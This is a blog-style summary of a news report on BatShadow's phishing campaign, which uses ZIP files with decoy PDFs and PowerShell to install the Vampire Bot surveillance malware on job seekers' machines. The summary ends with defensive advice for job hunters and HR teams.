Vampire Bot Malware Sinks Fangs Into Job Hunters

Steven

Vampire Bot Malware Sinks Fangs Into Job Hunters

Summary

A Vietnam-based threat group tracked as BatShadow has been running a phishing campaign aimed at job seekers and digital marketing professionals. The attackers send ZIP attachments that contain lure PDFs and hidden malicious files; when victims open them a fake PDF appears while PowerShell scripts silently install Vampire Bot.

Vampire Bot, written in Go, provides persistent surveillance: it takes periodic screenshots (compressed to WEBP), harvests system metadata, hides in core folders, and communicates with a command-and-control (C2) server to receive commands or additional payloads. Aryaka Threat Research Labs documented these behaviours and linked the campaign to a broader trend of Vietnamese-speaking cybercrime groups using phishing and data marketplaces to monetise stolen information.

Key Points

  • Targets: job seekers and digital marketing professionals who are more likely to open unsolicited career-related files.
  • Infection vector: ZIP files combining a decoy PDF and a malicious executable; PowerShell scripts run the payload while showing a fake PDF.
  • Capabilities: continuous desktop surveillance via periodic screenshots (WEBP), system profiling, persistence and C2 check-ins for remote control and additional payloads.
  • Evasion: malware hides in system folders, adjusts file attributes and may prompt users to change default browsers to bypass native protections.
  • Attribution and context: Aryaka links the campaign to BatShadow, one of several Vietnam-linked groups leveraging phishing and criminal marketplaces for stolen data.
  • Defensive hint: the campaign blends into normal-looking job workflows, increasing the chance of successful compromise and prolonged visibility on victims’ machines.

Content Summary

Researchers observed Vampire Bot distributed via social-engineering lures that imitate legitimate job or client communications. The attack sequence typically uses a ZIP file with a decoy PDF and a concealed executable; launching the file runs PowerShell scripts that display the decoy while silently installing the malware. Once installed, Vampire Bot collects device information, takes and exfiltrates screenshots over encrypted channels, and maintains persistence through hiding techniques and ongoing C2 communication.

The campaign demonstrates a shift where cybercriminals exploit everyday professional workflows — especially job-hunting activity — to trick users into executing malicious files. BatShadow is part of a growing set of groups operating out of Vietnam and the wider Southeast Asia region that rely on phishing and data reselling ecosystems to monetise access.

Context and Relevance

Punchy take: this isn’t just another phishing fling — Vampire Bot is a surveillance-focused implant that can quietly harvest extensive information from personal and work machines. For security teams, recruiters and anyone currently job hunting, the article highlights how attackers weaponise trust in recruitment and client communications to get a foothold.

The story fits into broader trends: increased use of commodity tooling by regional cybercrime groups, reliance on phishing for initial access, and marketplaces (including Telegram-based ecosystems) that sell stolen credentials and data. Organisations should treat recruitment workflows as part of their threat surface and apply targeted controls accordingly.

Why should I read this?

If you’re job hunting, hiring or running an estate with remote workers, read this. It explains the exact trick (ZIP + fake PDF + PowerShell) attackers use and what the malware actually does (silent screenshots, system profiling, C2 callbacks). Saves you time: read the highlights here, then act on the quick defensive steps below.

Quick defensive actions

  • Warn job applicants and HR teams about unsolicited ZIPs and unexpected attachments.
  • Block or sandbox email attachments that contain executables; enforce ZIP inspection and filtering.
  • Harden endpoints: restrict PowerShell execution, enable EDR with behavioural detection and monitor for unusual screenshotting or C2 traffic.
  • Keep browsers, AV/EDR and OS patches current and educate users to treat recruitment communications cautiously.

Source

Source: https://www.darkreading.com/cyberattacks-data-breaches/vampire-bot-malware-job-hunters